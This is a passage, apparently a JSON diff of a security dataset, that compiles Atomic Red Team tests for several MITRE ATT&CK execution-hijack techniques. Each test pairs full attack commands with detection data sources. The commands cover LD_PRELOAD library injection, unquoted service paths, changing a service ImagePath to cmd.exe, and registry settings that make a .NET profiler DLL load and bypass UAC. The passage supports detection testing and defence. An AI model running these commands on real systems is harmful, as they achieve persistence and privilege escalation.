"LD_PRELOAD=/tmp/T1574006.so ls\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.006", + "display_name": "Hijack Execution Flow: LD_PRELOAD", + "atomic_tests": [ + { + "name": "Shared Library Injection via /etc/ld.so.preload", + "auto_generated_guid": "39cb0e67-dd0d-4b74-a74b-c072db7ae991", + "description": "This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_shared_library_source": { + "description": "Path to a shared library source code", + "type": "Path", + "default": "PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c" + }, + "path_to_shared_library": { + "description": "Path to a shared library object", + "type": "Path", + "default": "/tmp/T1574006.so" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_to_shared_library})\n", + "prereq_command": "if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}\n" + } + ], + "executor": { + "command": "sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'\n", + "cleanup_command": "sudo sed -i 's##{path_to_shared_library}##' /etc/ld.so.preload\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Shared Library Injection via LD_PRELOAD", + "auto_generated_guid": "bc219ff7-789f-4d51-9142-ecae3397deae", + "description": "This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_shared_library_source": { + "description": "Path to a shared library source code", + "type": "Path", + "default": "PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c" + }, + "path_to_shared_library": { + "description": "Path to a shared library object", + "type": "Path", + "default": "/tmp/T1574006.so" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The shared library must exist on disk at specified location (#{path_to_shared_library})\n", + "prereq_command": "if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}\n" + } + ], + "executor": { + "command": "LD_PRELOAD=#{path_to_shared_library} ls\n", + "name": "bash" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1574.009", + "command_list": [ + "copy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\Program Files\\windows_service.exe\"\ncopy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n" + ], + "commands": [ + { + "command": "copy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\Program Files\\windows_service.exe\"\ncopy PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n", + "source": "atomics/T1574.009/T1574.009.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Path Interception by Unquoted Path" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.009", + "display_name": "Hijack Execution Flow: Path Interception by Unquoted Path", + "atomic_tests": [ + { + "name": "Execution of program.exe as service with unquoted service path", + "auto_generated_guid": "2770dea7-c50f-457b-84c4-c40a47460d9f", + "description": "When a service is created whose executable path contains spaces and isn\u2019t enclosed within quotes, leads to a vulnerability\nknown as Unquoted Service Path which allows a user to gain SYSTEM privileges.\nIn this case, if an executable program.exe in C:\\ exists, C:\\program.exe will be executed instead of test.exe in C:\\Program Files\\subfolder\\test.exe.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "service_executable": { + "description": "Path of the executable used for the service and as the hijacked program.exe", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.009\\bin\\WindowsServiceExample.exe" + } + }, + "executor": { + "command": "copy #{service_executable} \"C:\\Program Files\\windows_service.exe\"\ncopy #{service_executable} \"C:\\program.exe\"\nsc create \"Example Service\" binpath= \"C:\\Program Files\\windows_service.exe\" Displayname= \"Example Service\" start= auto\nsc start \"Example Service\"\n", + "cleanup_command": "sc stop \"Example Service\" >nul 2>&1\nsc delete \"Example Service\" >nul 2>&1\ndel \"C:\\Program Files\\windows_service.exe\" >nul 2>&1\ndel \"C:\\program.exe\" >nul 2>&1\ndel \"C:\\Time.log\" >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.011", + "command_list": [ + "get-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\* |FL\nget-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\weakservicename |FL\n", + "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\calcservice\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"%windir%\\system32\\cmd.exe\"\n" + ], + "commands": [ + { + "command": "get-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\* |FL\nget-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\weakservicename |FL\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + }, + { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\calcservice\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + }, + { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + }, + { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"%windir%\\system32\\cmd.exe\"\n", + "source": "atomics/T1574.011/T1574.011.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: Services Registry Permissions Weakness" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.011", + "display_name": "Hijack Execution Flow: Services Registry Permissions Weakness", + "atomic_tests": [ + { + "name": "Service Registry Permissions Weakness", + "auto_generated_guid": "f7536d63-7fd4-466f-89da-7e48d550752a", + "description": "Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /v ImagePath /d \"C:\\temp\\AtomicRedteam.exe\"\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "weak_service_name": { + "description": "weak service check", + "type": "String", + "default": "weakservicename" + } + }, + "executor": { + "command": "get-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\* |FL\nget-acl REGISTRY::HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name} |FL\n", + "name": "powershell" + } + }, + { + "name": "Service ImagePath Change with reg.exe", + "auto_generated_guid": "f38e9eea-e1d7-4ba6-b716-584791963827", + "description": "Change Service registry ImagePath of a bengin service to a malicious file\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "weak_service_name": { + "description": "weak service name", + "type": "String", + "default": "calcservice" + }, + "weak_service_path": { + "description": "weak service path", + "type": "String", + "default": "%windir%\\system32\\win32calc.exe" + }, + "malicious_service_path": { + "description": "malicious service path", + "type": "String", + "default": "%windir%\\system32\\cmd.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The service must exist (#{weak_service_name})\n", + "prereq_command": "if (Get-Service #{weak_service_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "sc.exe create #{weak_service_name} binpath= \"#{weak_service_path}\"\n" + } + ], + "executor": { + "command": "reg.exe add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{weak_service_name}\" /f /v ImagePath /d \"#{malicious_service_path}\"\n", + "cleanup_command": "sc.exe delete #{weak_service_name}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1574.012", + "command_list": [ + "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\n", + "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = 'PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'\n$env:COR_PROFILER_PATH = '#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n" + ], + "commands": [ + { + "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = 'PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + }, + { + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'\n$env:COR_PROFILER_PATH = '#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "source": "atomics/T1574.012/T1574.012.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: COR_PROFILER" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.012", + "display_name": "Hijack Execution Flow: COR_PROFILER", + "atomic_tests": [ + { + "name": "User scope COR_PROFILER", + "auto_generated_guid": "9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a", + "description": "Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).\nThe unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.\nAdditionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.\nIf the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,\nthe notepad process will not execute with high integrity.\n\nReference: https://redcanary.com/blog/cor_profiler-for-persistence/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_name": { + "description": "unmanaged profiler DLL", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.012\\bin\\T1574.012x64.dll" + }, + "clsid_guid": { + "description": "custom clsid guid", + "type": "String", + "default": "{09108e71-974c-4010-89cb-acf471ae9e2c}" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "#{file_name} must be present\n", + "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile 